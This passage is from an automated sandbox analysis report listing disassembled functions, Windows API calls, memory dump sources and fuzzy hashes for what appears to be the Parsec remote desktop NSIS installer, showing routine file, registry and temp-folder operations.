                                control_flow_graph 748 40176f-401794 call 402da6 call 405e83 753 401796-40179c call 40653d 748->753 754 40179e-4017b0 call 40653d call 405e0c lstrcatW 748->754 759 4017b5-4017b6 call 4067c4 753->759 754->759 763 4017bb-4017bf 759->763 764 4017c1-4017cb call 406873 763->764 765 4017f2-4017f5 763->765 772 4017dd-4017ef 764->772 773 4017cd-4017db CompareFileTime 764->773 766 4017f7-4017f8 call 406008 765->766 767 4017fd-401819 call 40602d 765->767 766->767 775 40181b-40181e 767->775 776 40188d-4018b6 call 40559f call 4032b4 767->776 772->765 773->772 777 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 775->777 778 40186f-401879 call 40559f 775->778 788 4018b8-4018bc 776->788 789 4018be-4018ca SetFileTime 776->789 777->763 810 401864-401865 777->810 790 401882-401888 778->790 788->789 792 4018d0-4018db CloseHandle 788->792 789->792 793 402c33 790->793 796 4018e1-4018e4 792->796 797 402c2a-402c2d 792->797 798 402c35-402c39 793->798 800 4018e6-4018f7 call 40657a lstrcatW 796->800 801 4018f9-4018fc call 40657a 796->801 797->793 807 401901-4023a2 call 405b9d 800->807 801->807 807->797 807->798 810->790 812 401867-401868 810->812 812->778
                                APIs
                                • lstrcatW.KERNEL32(00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017B0
                                • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files\Parsec\parsecd.exe","C:\Program Files\Parsec\parsecd.exe",00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017D5
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00403418,00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: "C:\Program Files\Parsec\parsecd.exe"$C:\Program Files\Parsec$C:\Program Files\Parsec
                                • API String ID: 1941528284-119262318
                                • Opcode ID: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                • Opcode Fuzzy Hash: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                • CloseHandle.KERNELBASE(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                • Opcode Fuzzy Hash: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 871 405a6e-405ab9 CreateDirectoryW 872 405abb-405abd 871->872 873 405abf-405acc GetLastError 871->873 874 405ae6-405ae8 872->874 873->874 875 405ace-405ae2 SetFileSecurityW 873->875 875->872 876 405ae4 GetLastError 875->876 876->874
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                • GetLastError.KERNEL32 ref: 00405AC5
                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                • GetLastError.KERNEL32 ref: 00405AE4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 3449924974-3081826266
                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                • wsprintfW.USER32 ref: 00404DF0
                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                • Opcode Fuzzy Hash: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040607A
                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-678247507
                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Remove folder: ,?,?,00406672,80000002), ref: 00406451
                                • RegCloseKey.KERNELBASE(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\), ref: 0040645C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Remove folder:
                                • API String ID: 3356406503-1958208860
                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-3081826266
                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C1C
                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: File$Attributes$DeleteDirectoryRemove
                                • String ID:
                                • API String ID: 1655745494-0
                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                Function 00404472 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000408,?,00000000,004040D1), ref: 00404490
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: x
                                • API String ID: 3850602802-2363233923
                                • Opcode ID: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                                • Instruction ID: 1b38e0d23eed931a714c5b599c5829f4d2050063c4158495342b67dc2c27a344
                                • Opcode Fuzzy Hash: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                                • Instruction Fuzzy Hash: 10C01271140200EACB004B00DE01F0A7A20B7A0B02F209039F381210B087B05422DB0C
                                Function 00405672 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 00405682
                                  • Part of subcall function 004044E5: SendMessageW.USER32(000A0296,00000000,00000000,00000000), ref: 004044F7
                                • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004056CE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: InitializeMessageSendUninitialize
                                • String ID:
                                • API String ID: 2896919175-0
                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
